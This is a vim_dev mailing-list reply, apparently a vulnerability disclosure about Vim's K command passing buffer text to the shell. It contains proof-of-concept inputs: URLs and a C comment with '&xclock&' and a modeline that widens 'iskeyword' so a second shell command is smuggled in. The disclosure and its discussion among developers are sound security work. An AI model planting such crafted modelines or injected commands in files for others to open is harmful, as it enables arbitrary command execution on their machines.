On Wed, Aug 20, 2008 at 8:18 AM, Tony Mechelynck
<[EMAIL PROTECTED]> wrote:
>
> On 20/08/08 06:51, Jan Minář wrote:
> [...]
>> Opening the following URL using the K command will launch the
>> xclock(1x) program:
>>
>> http://www.google.co.uk/search?q=&xclock&;
>
> Pasting this into the SeaMonkey location bar opens a Google page.
> Hitting K on it in gvim with 'keywordprg' set to "seamonkey" invokes
> ":!seamonkey http" which gives a page from the site http://www.http.com/
> In neither case do I see any xclock process, even though the program is
> in my $PATH.
You need to have 'iskeyword' set to a sensible value. Sensible, that
is, for handling URLs. A version using a modeline to set the
'iskeyword':
http://www.example.com&xclock&;
vim:
iskeyword=58,?,#,[,],@,!,$,&,',(,),*,+,44,;,=,45,.,_,~,/,48-57,A-Z,a-z,%
>> But, of course, it's much worse: Since the URL is inside a buffer, we
>> can assume the whole of the buffer can be controlled by the attacker.
>> They can use a modeline to set 'iskeyword' to contain any characters
>> needed for a particular shell command:
>>
>> /* We use an obscure glibc function -- check out the man page! */
>> clockface = (xclock&)pwnme(a, b, x + y);
>> [...]
>> /* vim:iskeyword:a-z,&,),(: */
The above will of course not work. The following will:
/* We use an obscure glibc function -- check out the man page! */
clockface = &(xclock)&pwnme (a, b, x + y);
/* :vim:iskeyword=a-z,&,),(: */
Cheers,
Jan.
--~--~---------~--~----~------------~-------~--~----~
You received this message from the "vim_dev" maillist.
For more information, visit http://www.vim.org/maillist.php
-~----------~----~----~----~------~----~------~--~---
